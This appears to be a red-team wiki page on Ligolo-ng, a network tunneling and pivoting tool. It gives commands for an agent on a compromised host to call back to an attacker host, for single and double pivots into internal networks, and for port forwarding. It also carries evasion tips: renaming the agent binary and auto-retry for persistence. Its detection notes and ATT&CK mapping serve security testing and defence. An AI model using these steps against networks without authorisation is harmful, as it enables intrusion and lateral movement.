Ligolo-ng
Comprehensive guide to Ligolo-ng, a modern tunneling and pivoting tool for red team operations, featuring TUN interface support, multi-platform agents, and secure TLS communications.
Dec 16, 2025
Updated Dec 11, 2025
2 min read
Ligolo-ngTunnelingPivotingRed TeamPost-ExploitationPenetration TestingLateral MovementNetwork Security
Introduction
Ligolo-ng is a tunneling tool that creates TUN interfaces for direct network routing. Unlike SOCKS proxies, it allows you to route traffic to internal networks without per-tool proxychains configuration.
The tool consists of two components:
- Proxy - Runs on the attacker's machine, creates TUN interfaces
- Agent - Runs on the compromised target, requires no privileges
Why Ligolo-ng?
Ligolo-ng offers significant advantages over traditional pivoting tools:
- No SOCKS configuration needed - Route traffic directly via TUN interfaces
- Cross-platform agents - Windows, Linux, macOS support
- No privileges required on the agent side
- TLS encryption - Secure communications with certificate validation
- Multi-session support - Handle multiple agents simultaneously
Installation
Proxy (Attacker Machine)
# Download latest release
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_Linux_64bit.tar.gz
tar -xzf ligolo-ng_proxy_Linux_64bit.tar.gz
# Or build from source
git clone https://github.com/nicocha30/ligolo-ng
cd ligolo-ng
go build -o proxy cmd/proxy/main.goAgent (Target Machine)
Download the appropriate agent binary for the target OS from the releases page.
Quick Start
1. Create TUN Interface (Linux)
# Create TUN interface
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
# Or use Ligolo-ng v0.6+ built-in command (after starting proxy)
ligolo-ng » interface_create --name ligolo2. Start the Proxy
# Using self-signed certificate (lab environments)
sudo ./proxy -selfcert
# Using Let's Encrypt (requires port 80)
sudo ./proxy -autocert
# Using custom certificates
sudo ./proxy -certfile cert.pem -keyfile key.pem3. Deploy and Run Agent
# On target machine
./agent -connect <ATTACKER_IP>:11601 -ignore-cert
# With certificate validation (recommended for production)
./agent -connect <ATTACKER_IP>:11601 -accept-fingerprint <FINGERPRINT>4. Configure Tunnel
# Select the agent session
ligolo-ng » session
? Specify a session: 1 - user@target - 10.10.10.5:38000
# View target network interfaces
[Agent: user@target] » ifconfig
# Start the tunnel
[Agent: user@target] » tunnel_start --tun ligolo
# Add route to internal network
sudo ip route add 192.168.1.0/24 dev ligolo
# Or using Ligolo-ng CLI
ligolo-ng » interface_add_route --name ligolo --route 192.168.1.0/24Advanced Usage
Accessing Agent's Local Ports
Ligolo-ng reserves a special CIDR 240.0.0.0/4 for accessing the agent's localhost:
# Add route to magic CIDR
sudo ip route add 240.0.0.1/32 dev ligolo
# Now access agent's local services
nmap 240.0.0.1 -sV
curl http://240.0.0.1:8080Port Forwarding (Listeners)
Forward ports from the agent to your machine:
# Forward agent's port 3389 to your localhost:3389
[Agent: user@target] » listener_add --addr 0.0.0.0:3389 --to 127.0.0.1:3389 --tcp
# List active listeners
[Agent: user@target] » listener_list
# Remove listener
[Agent: user@target] » listener_stop --id 0Double Pivoting
For multi-hop scenarios (Agent1 → Agent2 → Internal Network):
# Create second TUN interface
ligolo-ng » interface_create --name ligolo2
# On Agent1, forward port to Agent2
[Agent1] » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
# Connect Agent2 through Agent1
# On second compromised host
./agent -connect <AGENT1_IP>:11601 -ignore-cert
# Select Agent2 and start tunnel on ligolo2
[Agent2] » tunnel_start --tun ligolo2
# Add routes for the deeper network
sudo ip route add 10.10.10.0/24 dev ligolo2TLS Certificate Validation
For secure operations, validate certificates:
# Get certificate fingerprint from proxy
ligolo-ng » certificate_fingerprint
INFO[0203] TLS Certificate fingerprint: D005527D2683A8F2DB73022FBF23188E064493CFA17D6FCF257E14F4B692E0FC
# Connect agent with fingerprint validation
./agent -connect attacker.com:11601 -accept-fingerprint D005527D...Platform-Specific Configuration
Windows Proxy Setup
- Download Wintun driver
- Place
wintun.dllin same directory as proxy - Run proxy as Administrator
# Add route on Windows
route add 192.168.1.0 mask 255.255.255.0 0.0.0.0 if <INTERFACE_IDX>
# Find interface index
netsh int ipv4 show interfacesmacOS Setup
# Create interface
sudo ifconfig utun4 alias 10.0.0.1 255.255.255.0
# Add route
sudo route add -net 192.168.1.0/24 -interface utun4
# Start tunnel (use utun device)
[Agent] » tunnel_start --tun utun4Command Reference
Proxy Commands
| Command | Description |
|---|---|
session | Select an agent session |
sessions | List all connected agents |
interface_create | Create new TUN interface |
interface_list | List TUN interfaces |
certificate_fingerprint | Show TLS certificate fingerprint |
Agent Session Commands
| Command | Description |
|---|---|
ifconfig | Show agent's network interfaces |
tunnel_start | Start tunnel on specified TUN |
tunnel_stop | Stop active tunnel |
listener_add | Create port forward |
listener_list | List port forwards |
listener_stop | Remove port forward |
Operational Security
OPSEC Considerations
- Use certificate validation in production environments
- Agent binary can be renamed to blend in
- Consider agent auto-retry for persistence:
./agent -connect host:11601 -retry - Traffic is encrypted but connection patterns may be detectable
Detection
Defenders may detect Ligolo-ng through:
- Outbound connections to uncommon ports (default 11601)
- TLS connections with self-signed certificates
- Unusual network traffic patterns from compromised hosts
Related Resources
- Impacket - Complementary tools for Windows attacks
- Sliver - C2 framework with built-in pivoting
- Network Attacks - Services to target through pivots
References
MITRE ATT&CK Techniques
- T1572 - Protocol Tunneling - TUN interface tunneling
- T1090.001 - Proxy: Internal Proxy - Internal network pivoting
- T1090.002 - Proxy: External Proxy - Outbound proxy chains
- T1095 - Non-Application Layer Protocol - Network tunneling
- T1021 - Remote Services - Accessing internal services
Official Documentation
- Ligolo-ng GitHub - Source code
- Ligolo-ng Wiki - Configuration guide
Related Tools
Last updated on
John the Ripper: Comprehensive Password Cracking Guide
Master John the Ripper for password recovery and security testing. Complete guide covering hash formats, attack modes, rules, and session management.
Mimikatz
Comprehensive guide to Mimikatz for credential extraction, pass-the-hash, Kerberos attacks, and Windows post-exploitation techniques.